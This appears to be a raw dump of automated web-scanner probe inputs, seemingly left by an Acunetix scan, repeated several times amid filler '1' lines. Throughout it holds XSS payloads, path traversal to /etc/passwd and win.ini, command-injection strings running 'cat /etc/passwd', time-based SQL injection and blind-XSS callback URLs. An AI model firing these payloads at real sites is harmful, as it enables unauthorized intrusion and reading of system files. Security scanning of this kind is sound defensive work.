1

1

1

../../../../../../../../../../boot.ini

1_oP4iu <ScRiPt >prompt(998145)</ScRiPt>

&cat /etc/passwd&

"+response.write(9446592*9806268)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../windows/win.ini.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1

1

1

"&cat /etc/passwd&"

windowswin.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

../../../../../../../../../../etc/passwd

1

................windowswin.ini

cat /etc/passwd

1

1

1

1

1

1

acu5703<s1﹥s2ʺs3ʹuca5703

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

..\..\..\..\..\..\..\..\windows\win.ini

`cat /etc/passwd`

1

1

acux3082z1z2abcxuca3082

1

1

1

${100396+99439}

1<ScRiPt >prompt(975072)</ScRiPt>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

/.\./.\./.\./.\./.\./.\./windows/win.ini

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

1<script>prompt(930423)</script>

1

if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1some_inexistent_file_with_long_name%00.jpg

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1&n911719=v976214

1<ScRiPt >prompt(920575)</ScRiPt>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"|"ld

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?939067></ScRiPt>

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1<ScRiPt >prompt(975268)</ScRiPt>

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

1

-1

1

1<video><source onerror="javascript:prompt(969850)">

'

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

-1)

!(()&&!|*|*|

WEB-INF/web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(924126)"></g></svg>

-1))

1

1

^(#$!@#$)(()))******

/etc/passwd

"

'"()

WEB-INF\web.xml

1

1

1<div style=width:expression(prompt(947196))>

LApxDztU'

1

1

1

||cat /etc/passwd

1

bzCfTr9w')

1

1<iframe src='data:text/html

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

&dir

1

1

XSFuo99x'))

1<body onload=prompt(900328)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(910930)>

-1

1

1

'&dir&'

1

"

-1)

1

1

1<img src=xyz OnErRor=prompt(996516)>

................etc/passwd

"&dir&"

1

1

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

-1))

1

1<img/src=">" onerror=alert(906226)>

http://hitgfYI6ZACAB.bxss.me/

|dir

1

lehvQp0n'

${@print(md5(acunetix_wvs_security_test))}\

comments

1

1

1

1

file:///etc/passwd

1<ScRiPt%20>prompt(948703)</sCripT>

'|dir

1

comments

ifHUQv9J')

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1&lt

/\../\../\../\../\../\../\../etc/passwd

1

comments/.

8R9h3bVw'))

http://www.acunetix.tst

1

'"

1

<img acu onmouseover=prompt(960307) //>

1

1

1

1

WEB-INF/web.xml

"|dir

<!--

1'"()&%<ScRiPt >prompt(956240)</ScRiPt>

1<input autofocus onfocus=prompt(955514)>

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

WEB-INF\web.xml

1

'"()&%<ScRiPt >prompt(978142)</ScRiPt>

response.write(9282403*9961980)

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

&cat /etc/passwd&

1_950176

../../../../../../../../../../windows/win.ini

'+response.write(9282403*9961980)+'

1

1

1_r3H2x <ScRiPt >prompt(924628)</ScRiPt>

../../../../../../../../../../boot.ini

'&cat /etc/passwd&'

1

"+response.write(9282403*9961980)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

windowswin.ini

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1

1

................windowswin.ini

1

1

`cat /etc/passwd`

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

../../../../../../../../../../etc/passwd

acu3312<s1﹥s2ʺs3ʹuca3312

1

1

|cat /etc/passwd#

1

1

acux3272z1z2abcxuca3272

/.\./.\./.\./.\./.\./.\./windows/win.ini

${100107+100440}

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

if(now()=sysdate(),sleep(9.654),0)/*'XOR(if(now()=sysdate(),sleep(9.654),0))OR'"XOR(if(now()=sysdate(),sleep(9.654),0))OR"*/

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt >prompt(917500)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

(select(0)from(select(sleep(9.654)))v)/*'+(select(0)from(select(sleep(9.654)))v)+'"+(select(0)from(select(sleep(9.654)))v)+"*/

1some_inexistent_file_with_long_name%00.jpg

1&n948614=v925946

"|"ld

1

1

../../../../../../../../../../etc/passwd.jpg

1<script>prompt(989154)</script>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

-1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1

1<ScRiPt >prompt(966380)</ScRiPt>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

testasp.vulnweb.com

1

1

)

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?901526></ScRiPt>

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF/web.xml

1

'

1

!(()&&!|*|*|

1

1

1<ScRiPt >prompt(921042)</ScRiPt>

XMG6FH2O'

/../..//../..//../..//../..//../..//etc/passwd.jpg

WEB-INF\web.xml

1

^(#$!@#$)(()))******

1

1

1<video><source onerror="javascript:prompt(952122)">

vwtTJ0N7')

"

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(951139)"></g></svg>

'"()

1

1

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

JcxRQtpJ'))

||cat /etc/passwd

1

1<div style=width:expression(prompt(933519))>

1

1

1

/etc/passwd

1

-1

1

&dir

1<iframe src='data:text/html

'

1

1

1

1

"

-1)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'&dir&'

1<body onload=prompt(924843)>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

acunetix_wvs_invalid_filename

1

-1))

${@print(md5(acunetix_wvs_security_test))}

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(993620)>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"&dir&"

comments

1

b9n4G5MR'

http://hit6CIKnfG6rA.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

1<img src=xyz OnErRor=prompt(986955)>

1

1

................etc/passwd

1

comments

|dir

1

1

b2IQL5nk')

1

1<img/src=">" onerror=alert(953989)>

1

comments/.

1

'|dir

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

0jInIm9Z'))

1

1

1

file:///etc/passwd

"|dir

1

1

1

1

1<ScRiPt%20>prompt(968602)</sCripT>

/\../\../\../\../\../\../\../etc/passwd

'"

http://www.acunetix.tst

1

1

1'"()&%<ScRiPt >prompt(996006)</ScRiPt>

1

1

1&lt

<!--

1

response.write(9190692*9963928)

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(979924)</ScRiPt>

1

1

1

1

'+response.write(9190692*9963928)+'

<img acu onmouseover=prompt(986276) //>

1_927250

WEB-INF\web.xml

1

1

1

1

1<input autofocus onfocus=prompt(905334)>

"+response.write(9190692*9963928)+"

1

1

1

1

&cat /etc/passwd&

../../../../../../../../../../windows/win.ini

<a href='http://www.acunetix.com'>website security</a>

1

1

'&cat /etc/passwd&'

[url=http://www.acunetix.com]website security[/url]

1

../../../../../../../../../../boot.ini

1

"&cat /etc/passwd&"

1

1

1_OMQkn <ScRiPt >prompt(959649)</ScRiPt>

1

cat /etc/passwd

../../../../../../../../../../windows/win.ini.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

SomeCustomInjectedHeader:injected_by_wvs

windowswin.ini

../../../../../../../../../../etc/passwd

1

`cat /etc/passwd`

1

SomeCustomInjectedHeader:injected_by_wvs

1

................windowswin.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

|cat /etc/passwd#

acu8436<s1﹥s2ʺs3ʹuca8436

../../../../../../../../../../etc/passwd.jpg

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

'|'ld

acux1252z1z2abcxuca1252

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

"|"ld

1<ScRiPt >prompt(983711)</ScRiPt>

1

1

1

if(now()=sysdate(),sleep(3.234),0)/*'XOR(if(now()=sysdate(),sleep(3.234),0))OR'"XOR(if(now()=sysdate(),sleep(3.234),0))OR"*/

${99216+99163}

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<script>prompt(999072)</script>

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

(select(0)from(select(sleep(3.234)))v)/*'+(select(0)from(select(sleep(3.234)))v)+'"+(select(0)from(select(sleep(3.234)))v)+"*/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1<ScRiPt >prompt(980299)</ScRiPt>

'

-1

1

1some_inexistent_file_with_long_name%00.jpg

1&n976689=v994448

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?957442></ScRiPt>

.\./.\./.\./.\./.\./.\./etc/passwd

-1)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1

"

1<ScRiPt >prompt(948112)</ScRiPt>

1

-1))

/etc/passwd

testasp.vulnweb.com

WEB-INF/web.xml

)

1

1<video><source onerror="javascript:prompt(907011)">

1

1

||cat /etc/passwd

1

jIMTpYIN'

!(()&&!|*|*|

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(927504)"></g></svg>

1

1

^(#$!@#$)(()))******

kjwGt0a7')

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

&dir

1

1<div style=width:expression(prompt(943466))>

1

1

oPrWidzn'))

1

1

................etc/passwd

1

1<iframe src='data:text/html

1

'&dir&'

1

-1

1

1

1<body onload=prompt(942272)>

'"()

1

1

-1)

1

'

1

"&dir&"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(993255)>

1

1

1

"

-1))

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

file:///etc/passwd

|dir

1<img src=xyz OnErRor=prompt(960119)>

1

${@print(md5(acunetix_wvs_security_test))}

nxAdU0hK'

/\../\../\../\../\../\../\../etc/passwd

http://hitXSGUkAJdbr.bxss.me/

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

7kVmjq2h')

'|dir

1<img/src=">" onerror=alert(970022)>

acunetix_wvs_invalid_filename

1

1

1

1

WEB-INF/web.xml

Ckt9SEPz'))

1

"|dir

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<ScRiPt%20>prompt(940764)</sCripT>

comments

WEB-INF\web.xml

1

1

1

1&lt

comments

1

1

1

1

../../../../../../../../../../windows/win.ini

http://www.acunetix.tst

<img acu onmouseover=prompt(996472) //>

comments/.

1

'"

1

1

1'"()&%<ScRiPt >prompt(989696)</ScRiPt>

../../../../../../../../../../boot.ini

1<input autofocus onfocus=prompt(902326)>

1

1

1

<!--

'"()&%<ScRiPt >prompt(976723)</ScRiPt>

response.write(9454726*9125336)

1

../../../../../../../../../../windows/win.ini.jpg

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

1_931623

1

'+response.write(9454726*9125336)+'

1

windowswin.ini

[url=http://www.acunetix.com]website security[/url]

1

1

1

"+response.write(9454726*9125336)+"

1

1

1_bYxCp <ScRiPt >prompt(936046)</ScRiPt>

1

................windowswin.ini

1

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

&cat /etc/passwd&

1

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

cat /etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

../../../../../../../../../../etc/passwd.jpg

1

acu10191<s1﹥s2ʺs3ʹuca10191

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

${99003+99586}

1

1

acux3316z1z2abcxuca3316

WEB-INF/web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

1

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1

1<ScRiPt >prompt(934902)</ScRiPt>

'|'ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

WEB-INF\web.xml

1&n949076=v918048

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1some_inexistent_file_with_long_name%00.jpg

.\./.\./.\./.\./.\./.\./etc/passwd

1

1<script>prompt(903562)</script>

"|"ld

1

-1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1)

1<ScRiPt >prompt(963750)</ScRiPt>

1

)

/etc/passwd

1

-1))

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?978156></ScRiPt>

testasp.vulnweb.com

!(()&&!|*|*|

'

1

'"()

x83FEcaT'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

^(#$!@#$)(()))******

1<ScRiPt >prompt(994550)</ScRiPt>

1

1

1

1

rEpy2kLG')

"

1<video><source onerror="javascript:prompt(993660)">

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

C2swD3Ev'))

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(905391)"></g></svg>

1

||cat /etc/passwd

1

1

................etc/passwd

1<div style=width:expression(prompt(985205))>

-1

1

1

1

1

1

'

1<iframe src='data:text/html

-1)

&dir

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

"

'&dir&'

-1))

file:///etc/passwd

1<body onload=prompt(942596)>

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

acunetix_wvs_invalid_filename

i1uoCtzo'

1

/\../\../\../\../\../\../\../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(911523)>

"&dir&"

1

${@print(md5(acunetix_wvs_security_test))}\

1

comments

GZX8bCzX')

http://hitCKe8BD6c6M.bxss.me/

1

|dir

1

WEB-INF/web.xml

1<img src=xyz OnErRor=prompt(978684)>

LNqdIhYm'))

1

comments

1

1

WEB-INF\web.xml

'|dir

1<img/src=">" onerror=alert(922672)>

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments/.

1<ScRiPt%20>prompt(919898)</sCripT>

../../../../../../../../../../windows/win.ini

"|dir

'"

1

http://www.acunetix.tst

../../../../../../../../../../boot.ini

1

1&lt

1

<!--

1

1

1

../../../../../../../../../../windows/win.ini.jpg

response.write(9840397*9790877)

1'"()&%<ScRiPt >prompt(901468)</ScRiPt>

1

<img acu onmouseover=prompt(955864) //>

1

1

1

windowswin.ini

1

1

1

1

'"()&%<ScRiPt >prompt(997883)</ScRiPt>

1

1<input autofocus onfocus=prompt(905497)>

1

1

1

................windowswin.ini

'+response.write(9840397*9790877)+'

1_993690

1

<a href='http://www.acunetix.com'>website security</a>

&cat /etc/passwd&

"+response.write(9840397*9790877)+"

[url=http://www.acunetix.com]website security[/url]

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1_CKMGc <ScRiPt >prompt(909668)</ScRiPt>

1

'&cat /etc/passwd&'

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

acu9684<s1﹥s2ʺs3ʹuca9684

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

`cat /etc/passwd`

1

1

1

acux1274z1z2abcxuca1274

|cat /etc/passwd#

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1

1<ScRiPt >prompt(992393)</ScRiPt>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

'|'ld

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${100343+99265}

-1

1<script>prompt(936606)</script>

WEB-INF/web.xml

"|"ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<ScRiPt >prompt(992561)</ScRiPt>

1

1some_inexistent_file_with_long_name%00.jpg

1

1

-1)

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?928059></ScRiPt>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n920060=v936242

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

WEB-INF\web.xml

-1))

1

1

1<ScRiPt >prompt(946478)</ScRiPt>

1

!(()&&!|*|*|

testasp.vulnweb.com

'

bTH3PhNa'

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

1<video><source onerror="javascript:prompt(921352)">

^(#$!@#$)(()))******

1

"

hOfvcaNx')

1

/etc/passwd

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(946585)"></g></svg>

'"()

1

||cat /etc/passwd

p4wo4KDl'))

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<div style=width:expression(prompt(908931))>

1

1

1

1

1

&dir

-1

1<iframe src='data:text/html

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<body onload=prompt(924462)>

'&dir&'

-1)

'

1

1

................etc/passwd

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(929611)>

1

-1))

acunetix_wvs_invalid_filename

"&dir&"

"

1

http://hitWAhdMQjqW3.bxss.me/

2OFjR6aU'

1

1<img src=xyz OnErRor=prompt(940736)>

1

comments

file:///etc/passwd

${@print(md5(acunetix_wvs_security_test))}

|dir

1<img/src=">" onerror=alert(927772)>

RNWoTePS')

1

1

1

1

comments

/\../\../\../\../\../\../\../etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

9BOlCeuN'))

1<ScRiPt%20>prompt(934478)</sCripT>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'|dir

comments/.

1

1

1

1

WEB-INF/web.xml

1&lt

http://www.acunetix.tst

1

1

WEB-INF\web.xml

1

"|dir

<img acu onmouseover=prompt(980327) //>

'"

1

1'"()&%<ScRiPt >prompt(952031)</ScRiPt>

../../../../../../../../../../windows/win.ini

1

<!--

1<input autofocus onfocus=prompt(983296)>

1

1

'"()&%<ScRiPt >prompt(914702)</ScRiPt>

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

../../../../../../../../../../boot.ini

1

1_939711

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

1

response.write(9622521*9542069)

../../../../../../../../../../windows/win.ini.jpg

1_tN1Wg <ScRiPt >prompt(919644)</ScRiPt>

1

&cat /etc/passwd&

'+response.write(9622521*9542069)+'

1

windowswin.ini

1

1

"+response.write(9622521*9542069)+"

1

'&cat /etc/passwd&'

1

1

................windowswin.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

cat /etc/passwd

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

acu6531<s1﹥s2ʺs3ʹuca6531

1

1

../../../../../../../../../../etc/passwd

1

1

`cat /etc/passwd`

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

acux3025z1z2abcxuca3025

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

1<ScRiPt >prompt(944468)</ScRiPt>

|cat /etc/passwd#

${99782+99452}

1

../../../../../../../../../../etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

WEB-INF/web.xml

'|'ld

1

1&n902524=v909598

1<script>prompt(931034)</script>

1some_inexistent_file_with_long_name%00.jpg

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt >prompt(977061)</ScRiPt>

1

"|"ld

WEB-INF\web.xml

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

testasp.vulnweb.com

!(()&&!|*|*|

-1))

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?931659></ScRiPt>

3pT19Nqr'

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

^(#$!@#$)(()))******

nSRL5wZy')

'

1

'"()

1<ScRiPt >prompt(947069)</ScRiPt>

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

whnYcgti'))

1

1

"

1<video><source onerror="javascript:prompt(975450)">

1

1

/etc/passwd

1

-1

1

||cat /etc/passwd

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(938710)"></g></svg>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

&dir

-1)

1

1

1

1<div style=width:expression(prompt(932686))>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1))

'

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'&dir&'

1<iframe src='data:text/html

1

4nbJNcgg'

"

acunetix_wvs_invalid_filename

1

1

1

http://hithwT4JIPLsC.bxss.me/

1<body onload=prompt(948392)>

"&dir&"

................etc/passwd

lXmoppyg')

${@print(md5(acunetix_wvs_security_test))}

comments

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(982480)>

1

1

|dir

${@print(md5(acunetix_wvs_security_test))}\

WIO8BCTT'))

comments

1

1

1

1<img src=xyz OnErRor=prompt(900671)>

1

1

comments/.

1

file:///etc/passwd

1<img/src=">" onerror=alert(972876)>

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

'|dir

1

1

1

1<ScRiPt%20>prompt(933404)</sCripT>

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1&lt

'"

1

1

"|dir

WEB-INF/web.xml

<img acu onmouseover=prompt(982194) //>

1'"()&%<ScRiPt >prompt(959235)</ScRiPt>

1

1

<!--

1

1

1

1<input autofocus onfocus=prompt(954124)>

1

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(962370)</ScRiPt>

1

1

response.write(9432978*9487215)

<a href='http://www.acunetix.com'>website security</a>

1

../../../../../../../../../../windows/win.ini

1

1

1_967197

1

'+response.write(9432978*9487215)+'

[url=http://www.acunetix.com]website security[/url]

1

1

"+response.write(9432978*9487215)+"

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

../../../../../../../../../../boot.ini

1_JaJI3 <ScRiPt >prompt(981004)</ScRiPt>

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

1

1

1

1

1

windowswin.ini

cat /etc/passwd

1

../../../../../../../../../../etc/passwd

1

1

1

1

acu9079<s1﹥s2ʺs3ʹuca9079

................windowswin.ini

1

1

1

`cat /etc/passwd`

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

acux3908z1z2abcxuca3908

1

|cat /etc/passwd#

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${100159+99326}

1<ScRiPt >prompt(991786)</ScRiPt>

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

../../../../../../../../../../etc/passwd.jpg

1

'|'ld

1

1

1some_inexistent_file_with_long_name%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<script>prompt(995065)</script>

1&n915088=v962088

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<ScRiPt >prompt(926439)</ScRiPt>

"|"ld

-1

1

1

!(()&&!|*|*|

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

testasp.vulnweb.com

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?902621></ScRiPt>

-1)

1

1

^(#$!@#$)(()))******

1<ScRiPt >prompt(942266)</ScRiPt>

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

NrjQ0mMw'

1<video><source onerror="javascript:prompt(979663)">

1

'

1

1

'"()

1

zmjClwBf')

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(986523)"></g></svg>

1

.\./.\./.\./.\./.\./.\./etc/passwd

WEB-INF/web.xml

1

1

Q1fkfg5c'))

1<div style=width:expression(prompt(936465))>

1

1

"

1

1

/etc/passwd

-1

1

1<iframe src='data:text/html

WEB-INF\web.xml

1<body onload=prompt(934459)>

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

1

||cat /etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

